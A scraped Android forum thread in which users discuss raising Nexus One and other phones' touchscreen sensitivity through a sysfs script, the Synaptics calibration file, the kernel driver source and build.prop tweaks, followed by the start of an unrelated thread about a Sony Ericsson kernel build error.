Related
Does anyone have any information about how to adjust screen sensitivity under Android, specifricaly Froyo on Nexus One?
I'm trying to research this topic but there seems to be very little information about this. I can't find any tool, script or custom rom that would allow screen sensitivity to be adjusted.
I found a thread talking about doing it for Liqid's touch using script but that's about it. I took a look on the script and I can't move forward with it as the path's script uses do not exists in my Nexus One. If anyone has any experience with this please share. The goal is to make the screen more sensitive then it is as a default.
Thanks.
Thread reference above:
android.modaco.com/content-page/309503/increase-touch-screen-sensitivity-only-tested-on-liquide-1-100-05-based-roms/page/40/
Script:
#!/system/bin/sh
sensitivity=25
noise=25
echo "set sensitivity to $sensitivity"
echo $sensitivity > /sys/devices/platform/i2c-adapter/i2c-0/0-005c/sensitivity
echo "set noise to $noise"
echo $noise > /sys/devices/platform/i2c-adapter/i2c-0/0-005c/noise
echo "done"
Sorry for bringing back something from the dead, but I've been researching about this. Nexus One screen sensitivity is low, compared to other touch screens I've experimented with. I know Nexus One is using a Synaptics board. Digging in the source code of Android, I found that the settings on the device itself are located here:
/system/usr/idc/synaptics-rmi-touchscreen.idc
The contents of the file as per 2.3.7 are these (they are the same since Gingerbread):
# Copyright (C) 2010 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Input Device Calibration File for the Passion touch screen.
#
# These calibration values are derived from empirical measurements
# and may not be appropriate for use with other touch screens.
# Refer to the input device calibration documentation for more details.
#
# Touch Size
touch.touchSize.calibration = pressure
# Tool Size
# Driver reports tool size as a linear width measurement summed over
# all contact points.
#
# Raw width field measures approx. 1 unit per millimeter
# of tool size on the surface where a raw width of 1 corresponds
# to about 17mm of physical size. Given that the display resolution
# is 10px per mm we obtain a scale factor of 10 pixels / unit and
# a bias of 160 pixels. In addition, the raw width represents a
# sum of all contact area so we note this fact in the calibration.
touch.toolSize.calibration = linear
touch.toolSize.linearScale = 10
touch.toolSize.linearBias = 160
touch.toolSize.isSummed = 1
# Pressure
# Driver reports signal strength as pressure.
#
# A normal thumb touch while touching the back of the device
# typically registers about 100 signal strength units although
# this value is highly variable and is sensitive to contact area,
# manner of contact and environmental conditions. We set the
# scale so that a normal touch with good signal strength will be
# reported as having a pressure somewhere in the vicinity of 1.0,
# a featherlight touch will be below 1.0 and a heavy or large touch
# will be above 1.0. We don't expect these values to be accurate.
touch.pressure.calibration = amplitude
touch.pressure.source = default
touch.pressure.scale = 0.01
# Size
touch.size.calibration = normalized
# Orientation
touch.orientation.calibration = none
Click to expand...
Click to collapse
Also, in the kernel, the synaptics driver can be configured to be more sensitive. It is located here on the kernel source:
drivers/input/touchscreen/synaptics_i2c_rmi.c
/*
*
* Copyright (C) 2007 Google, Inc.
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/module.h>
#include <linux/delay.h>
#include <linux/earlysuspend.h>
#include <linux/hrtimer.h>
#include <linux/i2c.h>
#include <linux/input.h>
#include <linux/interrupt.h>
#include <linux/io.h>
#include <linux/platform_device.h>
#include <linux/slab.h>
#include <linux/synaptics_i2c_rmi.h>
static struct workqueue_struct *synaptics_wq;
struct synaptics_ts_data {
uint16_t addr;
struct i2c_client *client;
struct input_dev *input_dev;
int use_irq;
bool has_relative_report;
struct hrtimer timer;
struct work_struct work;
uint16_t max[2];
int snap_state[2][2];
int snap_down_on[2];
int snap_down_off[2];
int snap_up_on[2];
int snap_up_off[2];
int snap_down[2];
int snap_up[2];
uint32_t flags;
int reported_finger_count;
int8_t sensitivity_adjust;
int (*power)(int on);
struct early_suspend early_suspend;
};
#ifdef CONFIG_HAS_EARLYSUSPEND
static void synaptics_ts_early_suspend(struct early_suspend *h);
static void synaptics_ts_late_resume(struct early_suspend *h);
#endif
static int synaptics_init_panel(struct synaptics_ts_data *ts)
{
int ret;
ret = i2c_smbus_write_byte_data(ts->client, 0xff, 0x10); /* page select = 0x10 */
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_write_byte_data failed for page select\n");
goto err_page_select_failed;
}
ret = i2c_smbus_write_byte_data(ts->client, 0x41, 0x04); /* Set "No Clip Z" */
if (ret < 0)
printk(KERN_ERR "i2c_smbus_write_byte_data failed for No Clip Z\n");
ret = i2c_smbus_write_byte_data(ts->client, 0x44,
ts->sensitivity_adjust);
if (ret < 0)
pr_err("synaptics_ts: failed to set Sensitivity Adjust\n");
err_page_select_failed:
ret = i2c_smbus_write_byte_data(ts->client, 0xff, 0x04); /* page select = 0x04 */
if (ret < 0)
printk(KERN_ERR "i2c_smbus_write_byte_data failed for page select\n");
ret = i2c_smbus_write_byte_data(ts->client, 0xf0, 0x81); /* normal operation, 80 reports per second */
if (ret < 0)
printk(KERN_ERR "synaptics_ts_resume: i2c_smbus_write_byte_data failed\n");
return ret;
}
static void synaptics_ts_work_func(struct work_struct *work)
{
int i;
int ret;
int bad_data = 0;
struct i2c_msg msg[2];
uint8_t start_reg;
uint8_t buf[15];
struct synaptics_ts_data *ts = container_of(work, struct synaptics_ts_data, work);
int buf_len = ts->has_relative_report ? 15 : 13;
msg[0].addr = ts->client->addr;
msg[0].flags = 0;
msg[0].len = 1;
msg[0].buf = &start_reg;
start_reg = 0x00;
msg[1].addr = ts->client->addr;
msg[1].flags = I2C_M_RD;
msg[1].len = buf_len;
msg[1].buf = buf;
/* printk("synaptics_ts_work_func\n"); */
for (i = 0; i < ((ts->use_irq && !bad_data) ? 1 : 10); i++) {
ret = i2c_transfer(ts->client->adapter, msg, 2);
if (ret < 0) {
printk(KERN_ERR "synaptics_ts_work_func: i2c_transfer failed\n");
bad_data = 1;
} else {
/* printk("synaptics_ts_work_func: %x %x %x %x %x %x" */
/* " %x %x %x %x %x %x %x %x %x, ret %d\n", */
/* buf[0], buf[1], buf[2], buf[3], */
/* buf[4], buf[5], buf[6], buf[7], */
/* buf[8], buf[9], buf[10], buf[11], */
/* buf[12], buf[13], buf[14], ret); */
if ((buf[buf_len - 1] & 0xc0) != 0x40) {
printk(KERN_WARNING "synaptics_ts_work_func:"
" bad read %x %x %x %x %x %x %x %x %x"
" %x %x %x %x %x %x, ret %d\n",
buf[0], buf[1], buf[2], buf[3],
buf[4], buf[5], buf[6], buf[7],
buf[8], buf[9], buf[10], buf[11],
buf[12], buf[13], buf[14], ret);
if (bad_data)
synaptics_init_panel(ts);
bad_data = 1;
continue;
}
bad_data = 0;
if ((buf[buf_len - 1] & 1) == 0) {
/* printk("read %d coordinates\n", i); */
break;
} else {
int pos[2][2];
int f, a;
int base;
/* int x = buf[3] | (uint16_t)(buf[2] & 0x1f) << 8; */
/* int y = buf[5] | (uint16_t)(buf[4] & 0x1f) << 8; */
int z = buf[1];
int w = buf[0] >> 4;
int finger = buf[0] & 7;
/* int x2 = buf[3+6] | (uint16_t)(buf[2+6] & 0x1f) << 8; */
/* int y2 = buf[5+6] | (uint16_t)(buf[4+6] & 0x1f) << 8; */
/* int z2 = buf[1+6]; */
/* int w2 = buf[0+6] >> 4; */
/* int finger2 = buf[0+6] & 7; */
/* int dx = (int8_t)buf[12]; */
/* int dy = (int8_t)buf[13]; */
int finger2_pressed;
/* printk("x %4d, y %4d, z %3d, w %2d, F %d, 2nd: x %4d, y %4d, z %3d, w %2d, F %d, dx %4d, dy %4d\n", */
/* x, y, z, w, finger, */
/* x2, y2, z2, w2, finger2, */
/* dx, dy); */
base = 2;
for (f = 0; f < 2; f++) {
uint32_t flip_flag = SYNAPTICS_FLIP_X;
for (a = 0; a < 2; a++) {
int p = buf[base + 1];
p |= (uint16_t)(buf[base] & 0x1f) << 8;
if (ts->flags & flip_flag)
p = ts->max[a] - p;
if (ts->flags & SYNAPTICS_SNAP_TO_INACTIVE_EDGE) {
if (ts->snap_state[f][a]) {
if (p <= ts->snap_down_off[a])
p = ts->snap_down[a];
else if (p >= ts->snap_up_off[a])
p = ts->snap_up[a];
else
ts->snap_state[f][a] = 0;
} else {
if (p <= ts->snap_down_on[a]) {
p = ts->snap_down[a];
ts->snap_state[f][a] = 1;
} else if (p >= ts->snap_up_on[a]) {
p = ts->snap_up[a];
ts->snap_state[f][a] = 1;
}
}
}
pos[f][a] = p;
base += 2;
flip_flag <<= 1;
}
base += 2;
if (ts->flags & SYNAPTICS_SWAP_XY)
swap(pos[f][0], pos[f][1]);
}
if (z) {
input_report_abs(ts->input_dev, ABS_X, pos[0][0]);
input_report_abs(ts->input_dev, ABS_Y, pos[0][1]);
}
input_report_abs(ts->input_dev, ABS_PRESSURE, z);
input_report_abs(ts->input_dev, ABS_TOOL_WIDTH, w);
input_report_key(ts->input_dev, BTN_TOUCH, finger);
finger2_pressed = finger > 1 && finger != 7;
input_report_key(ts->input_dev, BTN_2, finger2_pressed);
if (finger2_pressed) {
input_report_abs(ts->input_dev, ABS_HAT0X, pos[1][0]);
input_report_abs(ts->input_dev, ABS_HAT0Y, pos[1][1]);
}
if (!finger)
z = 0;
input_report_abs(ts->input_dev, ABS_MT_TOUCH_MAJOR, z);
input_report_abs(ts->input_dev, ABS_MT_WIDTH_MAJOR, w);
input_report_abs(ts->input_dev, ABS_MT_POSITION_X, pos[0][0]);
input_report_abs(ts->input_dev, ABS_MT_POSITION_Y, pos[0][1]);
input_mt_sync(ts->input_dev);
if (finger2_pressed) {
input_report_abs(ts->input_dev, ABS_MT_TOUCH_MAJOR, z);
input_report_abs(ts->input_dev, ABS_MT_WIDTH_MAJOR, w);
input_report_abs(ts->input_dev, ABS_MT_POSITION_X, pos[1][0]);
input_report_abs(ts->input_dev, ABS_MT_POSITION_Y, pos[1][1]);
input_mt_sync(ts->input_dev);
} else if (ts->reported_finger_count > 1) {
input_report_abs(ts->input_dev, ABS_MT_TOUCH_MAJOR, 0);
input_report_abs(ts->input_dev, ABS_MT_WIDTH_MAJOR, 0);
input_mt_sync(ts->input_dev);
}
ts->reported_finger_count = finger;
input_sync(ts->input_dev);
}
}
}
if (ts->use_irq)
enable_irq(ts->client->irq);
}
static enum hrtimer_restart synaptics_ts_timer_func(struct hrtimer *timer)
{
struct synaptics_ts_data *ts = container_of(timer, struct synaptics_ts_data, timer);
/* printk("synaptics_ts_timer_func\n"); */
queue_work(synaptics_wq, &ts->work);
hrtimer_start(&ts->timer, ktime_set(0, 12500000), HRTIMER_MODE_REL);
return HRTIMER_NORESTART;
}
static irqreturn_t synaptics_ts_irq_handler(int irq, void *dev_id)
{
struct synaptics_ts_data *ts = dev_id;
/* printk("synaptics_ts_irq_handler\n"); */
disable_irq_nosync(ts->client->irq);
queue_work(synaptics_wq, &ts->work);
return IRQ_HANDLED;
}
static int synaptics_ts_probe(
struct i2c_client *client, const struct i2c_device_id *id)
{
struct synaptics_ts_data *ts;
uint8_t buf0[4];
uint8_t buf1[8];
struct i2c_msg msg[2];
int ret = 0;
uint16_t max_x, max_y;
int fuzz_x, fuzz_y, fuzz_p, fuzz_w;
struct synaptics_i2c_rmi_platform_data *pdata;
unsigned long irqflags;
int inactive_area_left;
int inactive_area_right;
int inactive_area_top;
int inactive_area_bottom;
int snap_left_on;
int snap_left_off;
int snap_right_on;
int snap_right_off;
int snap_top_on;
int snap_top_off;
int snap_bottom_on;
int snap_bottom_off;
uint32_t panel_version;
if (!i2c_check_functionality(client->adapter, I2C_FUNC_I2C)) {
printk(KERN_ERR "synaptics_ts_probe: need I2C_FUNC_I2C\n");
ret = -ENODEV;
goto err_check_functionality_failed;
}
ts = kzalloc(sizeof(*ts), GFP_KERNEL);
if (ts == NULL) {
ret = -ENOMEM;
goto err_alloc_data_failed;
}
INIT_WORK(&ts->work, synaptics_ts_work_func);
ts->client = client;
i2c_set_clientdata(client, ts);
pdata = client->dev.platform_data;
if (pdata)
ts->power = pdata->power;
if (ts->power) {
ret = ts->power(1);
if (ret < 0) {
printk(KERN_ERR "synaptics_ts_probe power on failed\n");
goto err_power_failed;
}
}
ret = i2c_smbus_write_byte_data(ts->client, 0xf4, 0x01); /* device command = reset */
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_write_byte_data failed\n");
/* fail? */
}
{
int retry = 10;
while (retry-- > 0) {
ret = i2c_smbus_read_byte_data(ts->client, 0xe4);
if (ret >= 0)
break;
msleep(100);
}
}
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_byte_data failed\n");
goto err_detect_failed;
}
printk(KERN_INFO "synaptics_ts_probe: Product Major Version %x\n", ret);
panel_version = ret << 8;
ret = i2c_smbus_read_byte_data(ts->client, 0xe5);
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_byte_data failed\n");
goto err_detect_failed;
}
printk(KERN_INFO "synaptics_ts_probe: Product Minor Version %x\n", ret);
panel_version |= ret;
ret = i2c_smbus_read_byte_data(ts->client, 0xe3);
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_byte_data failed\n");
goto err_detect_failed;
}
printk(KERN_INFO "synaptics_ts_probe: product property %x\n", ret);
if (pdata) {
while (pdata->version > panel_version)
pdata++;
ts->flags = pdata->flags;
ts->sensitivity_adjust = pdata->sensitivity_adjust;
irqflags = pdata->irqflags;
inactive_area_left = pdata->inactive_left;
inactive_area_right = pdata->inactive_right;
inactive_area_top = pdata->inactive_top;
inactive_area_bottom = pdata->inactive_bottom;
snap_left_on = pdata->snap_left_on;
snap_left_off = pdata->snap_left_off;
snap_right_on = pdata->snap_right_on;
snap_right_off = pdata->snap_right_off;
snap_top_on = pdata->snap_top_on;
snap_top_off = pdata->snap_top_off;
snap_bottom_on = pdata->snap_bottom_on;
snap_bottom_off = pdata->snap_bottom_off;
fuzz_x = pdata->fuzz_x;
fuzz_y = pdata->fuzz_y;
fuzz_p = pdata->fuzz_p;
fuzz_w = pdata->fuzz_w;
} else {
irqflags = 0;
inactive_area_left = 0;
inactive_area_right = 0;
inactive_area_top = 0;
inactive_area_bottom = 0;
snap_left_on = 0;
snap_left_off = 0;
snap_right_on = 0;
snap_right_off = 0;
snap_top_on = 0;
snap_top_off = 0;
snap_bottom_on = 0;
snap_bottom_off = 0;
fuzz_x = 0;
fuzz_y = 0;
fuzz_p = 0;
fuzz_w = 0;
}
ret = i2c_smbus_read_byte_data(ts->client, 0xf0);
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_byte_data failed\n");
goto err_detect_failed;
}
printk(KERN_INFO "synaptics_ts_probe: device control %x\n", ret);
ret = i2c_smbus_read_byte_data(ts->client, 0xf1);
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_byte_data failed\n");
goto err_detect_failed;
}
printk(KERN_INFO "synaptics_ts_probe: interrupt enable %x\n", ret);
ret = i2c_smbus_write_byte_data(ts->client, 0xf1, 0); /* disable interrupt */
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_write_byte_data failed\n");
goto err_detect_failed;
}
msg[0].addr = ts->client->addr;
msg[0].flags = 0;
msg[0].len = 1;
msg[0].buf = buf0;
buf0[0] = 0xe0;
msg[1].addr = ts->client->addr;
msg[1].flags = I2C_M_RD;
msg[1].len = 8;
msg[1].buf = buf1;
ret = i2c_transfer(ts->client->adapter, msg, 2);
if (ret < 0) {
printk(KERN_ERR "i2c_transfer failed\n");
goto err_detect_failed;
}
printk(KERN_INFO "synaptics_ts_probe: 0xe0: %x %x %x %x %x %x %x %x\n",
buf1[0], buf1[1], buf1[2], buf1[3],
buf1[4], buf1[5], buf1[6], buf1[7]);
ret = i2c_smbus_write_byte_data(ts->client, 0xff, 0x10); /* page select = 0x10 */
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_write_byte_data failed for page select\n");
goto err_detect_failed;
}
ret = i2c_smbus_read_word_data(ts->client, 0x02);
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_word_data failed\n");
goto err_detect_failed;
}
ts->has_relative_report = !(ret & 0x100);
printk(KERN_INFO "synaptics_ts_probe: Sensor properties %x\n", ret);
ret = i2c_smbus_read_word_data(ts->client, 0x04);
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_word_data failed\n");
goto err_detect_failed;
}
ts->max[0] = max_x = (ret >> 8 & 0xff) | ((ret & 0x1f) << 8);
ret = i2c_smbus_read_word_data(ts->client, 0x06);
if (ret < 0) {
printk(KERN_ERR "i2c_smbus_read_word_data failed\n");
goto err_detect_failed;
}
ts->max[1] = max_y = (ret >> 8 & 0xff) | ((ret & 0x1f) << 8);
if (ts->flags & SYNAPTICS_SWAP_XY)
swap(max_x, max_y);
ret = synaptics_init_panel(ts); /* will also switch back to page 0x04 */
if (ret < 0) {
printk(KERN_ERR "synaptics_init_panel failed\n");
goto err_detect_failed;
}
ts->input_dev = input_allocate_device();
if (ts->input_dev == NULL) {
ret = -ENOMEM;
printk(KERN_ERR "synaptics_ts_probe: Failed to allocate input device\n");
goto err_input_dev_alloc_failed;
}
ts->input_dev->name = "synaptics-rmi-touchscreen";
set_bit(EV_SYN, ts->input_dev->evbit);
set_bit(EV_KEY, ts->input_dev->evbit);
set_bit(BTN_TOUCH, ts->input_dev->keybit);
set_bit(BTN_2, ts->input_dev->keybit);
set_bit(EV_ABS, ts->input_dev->evbit);
inactive_area_left = inactive_area_left * max_x / 0x10000;
inactive_area_right = inactive_area_right * max_x / 0x10000;
inactive_area_top = inactive_area_top * max_y / 0x10000;
inactive_area_bottom = inactive_area_bottom * max_y / 0x10000;
snap_left_on = snap_left_on * max_x / 0x10000;
snap_left_off = snap_left_off * max_x / 0x10000;
snap_right_on = snap_right_on * max_x / 0x10000;
snap_right_off = snap_right_off * max_x / 0x10000;
snap_top_on = snap_top_on * max_y / 0x10000;
snap_top_off = snap_top_off * max_y / 0x10000;
snap_bottom_on = snap_bottom_on * max_y / 0x10000;
snap_bottom_off = snap_bottom_off * max_y / 0x10000;
fuzz_x = fuzz_x * max_x / 0x10000;
fuzz_y = fuzz_y * max_y / 0x10000;
ts->snap_down[!!(ts->flags & SYNAPTICS_SWAP_XY)] = -inactive_area_left;
ts->snap_up[!!(ts->flags & SYNAPTICS_SWAP_XY)] = max_x + inactive_area_right;
ts->snap_down[!(ts->flags & SYNAPTICS_SWAP_XY)] = -inactive_area_top;
ts->snap_up[!(ts->flags & SYNAPTICS_SWAP_XY)] = max_y + inactive_area_bottom;
ts->snap_down_on[!!(ts->flags & SYNAPTICS_SWAP_XY)] = snap_left_on;
ts->snap_down_off[!!(ts->flags & SYNAPTICS_SWAP_XY)] = snap_left_off;
ts->snap_up_on[!!(ts->flags & SYNAPTICS_SWAP_XY)] = max_x - snap_right_on;
ts->snap_up_off[!!(ts->flags & SYNAPTICS_SWAP_XY)] = max_x - snap_right_off;
ts->snap_down_on[!(ts->flags & SYNAPTICS_SWAP_XY)] = snap_top_on;
ts->snap_down_off[!(ts->flags & SYNAPTICS_SWAP_XY)] = snap_top_off;
ts->snap_up_on[!(ts->flags & SYNAPTICS_SWAP_XY)] = max_y - snap_bottom_on;
ts->snap_up_off[!(ts->flags & SYNAPTICS_SWAP_XY)] = max_y - snap_bottom_off;
printk(KERN_INFO "synaptics_ts_probe: max_x %d, max_y %d\n", max_x, max_y);
printk(KERN_INFO "synaptics_ts_probe: inactive_x %d %d, inactive_y %d %d\n",
inactive_area_left, inactive_area_right,
inactive_area_top, inactive_area_bottom);
printk(KERN_INFO "synaptics_ts_probe: snap_x %d-%d %d-%d, snap_y %d-%d %d-%d\n",
snap_left_on, snap_left_off, snap_right_on, snap_right_off,
snap_top_on, snap_top_off, snap_bottom_on, snap_bottom_off);
input_set_abs_params(ts->input_dev, ABS_X, -inactive_area_left, max_x + inactive_area_right, fuzz_x, 0);
input_set_abs_params(ts->input_dev, ABS_Y, -inactive_area_top, max_y + inactive_area_bottom, fuzz_y, 0);
input_set_abs_params(ts->input_dev, ABS_PRESSURE, 0, 255, fuzz_p, 0);
input_set_abs_params(ts->input_dev, ABS_TOOL_WIDTH, 0, 15, fuzz_w, 0);
input_set_abs_params(ts->input_dev, ABS_HAT0X, -inactive_area_left, max_x + inactive_area_right, fuzz_x, 0);
input_set_abs_params(ts->input_dev, ABS_HAT0Y, -inactive_area_top, max_y + inactive_area_bottom, fuzz_y, 0);
input_set_abs_params(ts->input_dev, ABS_MT_POSITION_X, -inactive_area_left, max_x + inactive_area_right, fuzz_x, 0);
input_set_abs_params(ts->input_dev, ABS_MT_POSITION_Y, -inactive_area_top, max_y + inactive_area_bottom, fuzz_y, 0);
input_set_abs_params(ts->input_dev, ABS_MT_TOUCH_MAJOR, 0, 255, fuzz_p, 0);
input_set_abs_params(ts->input_dev, ABS_MT_WIDTH_MAJOR, 0, 15, fuzz_w, 0);
/* ts->input_dev->name = ts->keypad_info->name; */
ret = input_register_device(ts->input_dev);
if (ret) {
printk(KERN_ERR "synaptics_ts_probe: Unable to register %s input device\n", ts->input_dev->name);
goto err_input_register_device_failed;
}
if (client->irq) {
ret = request_irq(client->irq, synaptics_ts_irq_handler, irqflags, client->name, ts);
if (ret == 0) {
ret = i2c_smbus_write_byte_data(ts->client, 0xf1, 0x01); /* enable abs int */
if (ret)
free_irq(client->irq, ts);
}
if (ret == 0)
ts->use_irq = 1;
else
dev_err(&client->dev, "request_irq failed\n");
}
if (!ts->use_irq) {
hrtimer_init(&ts->timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
ts->timer.function = synaptics_ts_timer_func;
hrtimer_start(&ts->timer, ktime_set(1, 0), HRTIMER_MODE_REL);
}
#ifdef CONFIG_HAS_EARLYSUSPEND
ts->early_suspend.level = EARLY_SUSPEND_LEVEL_BLANK_SCREEN + 1;
ts->early_suspend.suspend = synaptics_ts_early_suspend;
ts->early_suspend.resume = synaptics_ts_late_resume;
register_early_suspend(&ts->early_suspend);
#endif
printk(KERN_INFO "synaptics_ts_probe: Start touchscreen %s in %s mode\n", ts->input_dev->name, ts->use_irq ? "interrupt" : "polling");
return 0;
err_input_register_device_failed:
input_free_device(ts->input_dev);
err_input_dev_alloc_failed:
err_detect_failed:
err_power_failed:
kfree(ts);
err_alloc_data_failed:
err_check_functionality_failed:
return ret;
}
static int synaptics_ts_remove(struct i2c_client *client)
{
struct synaptics_ts_data *ts = i2c_get_clientdata(client);
unregister_early_suspend(&ts->early_suspend);
if (ts->use_irq)
free_irq(client->irq, ts);
else
hrtimer_cancel(&ts->timer);
input_unregister_device(ts->input_dev);
kfree(ts);
return 0;
}
static int synaptics_ts_suspend(struct i2c_client *client, pm_message_t mesg)
{
int ret;
struct synaptics_ts_data *ts = i2c_get_clientdata(client);
if (ts->use_irq)
disable_irq(client->irq);
else
hrtimer_cancel(&ts->timer);
ret = cancel_work_sync(&ts->work);
if (ret && ts->use_irq) /* if work was pending disable-count is now 2 */
enable_irq(client->irq);
ret = i2c_smbus_write_byte_data(ts->client, 0xf1, 0); /* disable interrupt */
if (ret < 0)
printk(KERN_ERR "synaptics_ts_suspend: i2c_smbus_write_byte_data failed\n");
ret = i2c_smbus_write_byte_data(client, 0xf0, 0x86); /* deep sleep */
if (ret < 0)
printk(KERN_ERR "synaptics_ts_suspend: i2c_smbus_write_byte_data failed\n");
if (ts->power) {
ret = ts->power(0);
if (ret < 0)
printk(KERN_ERR "synaptics_ts_resume power off failed\n");
}
return 0;
}
static int synaptics_ts_resume(struct i2c_client *client)
{
int ret;
struct synaptics_ts_data *ts = i2c_get_clientdata(client);
if (ts->power) {
ret = ts->power(1);
if (ret < 0)
printk(KERN_ERR "synaptics_ts_resume power on failed\n");
}
synaptics_init_panel(ts);
if (ts->use_irq)
enable_irq(client->irq);
if (!ts->use_irq)
hrtimer_start(&ts->timer, ktime_set(1, 0), HRTIMER_MODE_REL);
else
i2c_smbus_write_byte_data(ts->client, 0xf1, 0x01); /* enable abs int */
return 0;
}
#ifdef CONFIG_HAS_EARLYSUSPEND
static void synaptics_ts_early_suspend(struct early_suspend *h)
{
struct synaptics_ts_data *ts;
ts = container_of(h, struct synaptics_ts_data, early_suspend);
synaptics_ts_suspend(ts->client, PMSG_SUSPEND);
}
static void synaptics_ts_late_resume(struct early_suspend *h)
{
struct synaptics_ts_data *ts;
ts = container_of(h, struct synaptics_ts_data, early_suspend);
synaptics_ts_resume(ts->client);
}
#endif
static const struct i2c_device_id synaptics_ts_id[] = {
{ SYNAPTICS_I2C_RMI_NAME, 0 },
{ }
};
static struct i2c_driver synaptics_ts_driver = {
.probe = synaptics_ts_probe,
.remove = synaptics_ts_remove,
#ifndef CONFIG_HAS_EARLYSUSPEND
.suspend = synaptics_ts_suspend,
.resume = synaptics_ts_resume,
#endif
.id_table = synaptics_ts_id,
.driver = {
.name = SYNAPTICS_I2C_RMI_NAME,
},
};
static int __devinit synaptics_ts_init(void)
{
synaptics_wq = create_singlethread_workqueue("synaptics_wq");
if (!synaptics_wq)
return -ENOMEM;
return i2c_add_driver(&synaptics_ts_driver);
}
static void __exit synaptics_ts_exit(void)
{
i2c_del_driver(&synaptics_ts_driver);
if (synaptics_wq)
destroy_workqueue(synaptics_wq);
}
module_init(synaptics_ts_init);
module_exit(synaptics_ts_exit);
MODULE_DESCRIPTION("Synaptics Touchscreen Driver");
MODULE_LICENSE("GPL");
Click to expand...
Click to collapse
Maybe we can tweak only the .icl file, or we'll have to dig deep into the kernel to improve the responsiveness of this touch screen!
Increased the sensitivity by changing the value:
touch.pressure.scale = 0.01 to touch.pressure.scale = 0.001
in /system/usr/idc/synaptics-rmi-touchscreen.idc
Please use the Q&A Forum for questions Thanks
Moving to Q&A
dferreira said:
Increased the sensitivity by changing the value:
touch.pressure.scale = 0.01 to touch.pressure.scale = 0.001
in /system/usr/idc/synaptics-rmi-touchscreen.idc
Click to expand...
Click to collapse
I just tried this on my MyTouch 4G Slide (htc Doubleshot) running CyanogenMod 10 (20130101). It either works beautifully or it's my imagination. Thanks!!!!!
Screen Sensitivity Enhancement
GandalfTW said:
Does anyone have any information about how to adjust screen sensitivity under Android, specifricaly Froyo on Nexus One?
I'm trying to research this topic but there seems to be very little information about this. I can't find any tool, script or custom rom that would allow screen sensitivity to be adjusted.
I found a thread talking about doing it for Liqid's touch using script but that's about it. I took a look on the script and I can't move forward with it as the path's script uses do not exists in my Nexus One. If anyone has any experience with this please share. The goal is to make the screen more sensitive then it is as a default.
Thanks.
Thread reference above:
android.modaco.com/content-page/309503/increase-touch-screen-sensitivity-only-tested-on-liquide-1-100-05-based-roms/page/40/
Script:
#!/system/bin/sh
sensitivity=25
noise=25
echo "set sensitivity to $sensitivity"
echo $sensitivity > /sys/devices/platform/i2c-adapter/i2c-0/0-005c/sensitivity
echo "set noise to $noise"
echo $noise > /sys/devices/platform/i2c-adapter/i2c-0/0-005c/noise
echo "done"
Click to expand...
Click to collapse
The easiest way you can change your screen sensitivity is by using Screen Booster apps from Google Play. Its really works dude
So let's say I did this and now my screen doesn't work. How can I get it back?
found new method
worked for my zte v9800
Go to System and find build.prop
Then copy the bellow lines and just paste in bulid.prop
# Touch screen calibration and scroll responsiveness
debug.performance.tuning=1
windowsmgr.max_events_per_sec=200
view.touch_slop=2
view.scroll_friction=1.5
view.minimum_fling_velocity=25
ro.max.fling_velocity=12000
ro.min.fling_velocity=8000
ro.min_pointer_dur=8
touch.size.calibration=geometric
touch.size.scale=100
#touch.size.bias=70
touch.pressure.calibration=amplitude
touch.pressure.scale=0.3
Hi..
This is my first post & thread in XDA-Dev, pardon me if i break any rules...
Just tell what i could do to mend the situation and I'll gladly comply.
Intro
Here's what's been bugging me for the past few days.
I'm trying to recompile Sony Ericsson source code archived as x10_x10mini_X10minipro_x8_eclair_2.1.A.0.435.tar.gz to enable a few features :
Swap support
Ad-Hoc wifi
I followed the tutorial on Android Central (http://forum.androidcentral.com/htc-hero-rooting-roms-hacks/8072-how-build-your-own-kernel-package-source.html) except that I'm using SE's kernel codes rather than HTC's.
My Environment
Ubuntu 10.10 over VirtualBox over Windows 7
Using compiler in the Android Toolchain (gcc-4.4.0)
Folders Structure
~/android/source/ : Contain SE Kernel Sources
~/myandroid/ : Contain everything that you should get when you repo git://android.git.kernel.org/platform/manifest.git
Settings
hit export ARCH=arm
hit export CROSS_COMPILE=arm-eabi-
hit export PATH=$PATH:~/myandroid/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin
for .config, i used the one from 1.6 as latter version of SE phones does not have /proc/config.gz
What I did
First, i compiled the kernel using the default settings, it completes successfully.
I make clean
When i run make menuconfig I changed
General Setup --> [*] Support for paging of anonymous memory (swap)
System Type --> MSM Board Selection --> [ ] MSM7x27 Mimmi (deselect)
System Type --> MSM Board Selection --> [*] MSM7x27 Shakira (select)
I run make
I was thrown error below.
The Pain In The A$$
Code:
[FONT="Fixedsys"][COLOR="YellowGreen"] CC lib/radix-tree.o
CC lib/ratelimit.o
CC lib/rbtree.o
CC lib/reciprocal_div.o
CC lib/rwsem-spinlock.o
CC lib/sha1.o
CC lib/show_mem.o
CC lib/string.o
CC lib/vsprintf.o
AR lib/lib.a
LD vmlinux.o
MODPOST vmlinux.o
GEN .version
CHK include/linux/compile.h
UPD include/linux/compile.h
CC init/version.o
LD init/built-in.o
LD .tmp_vmlinux1[/COLOR]
[COLOR="Red"]arch/arm/mach-msm/built-in.o: In function `shakira_gpio_event_matrix_func':
/home/android/android/sources/kernel/arch/arm/mach-msm/board-shakira-keypad.c:90: undefined reference to `semc_gpio_event_matrix_func'
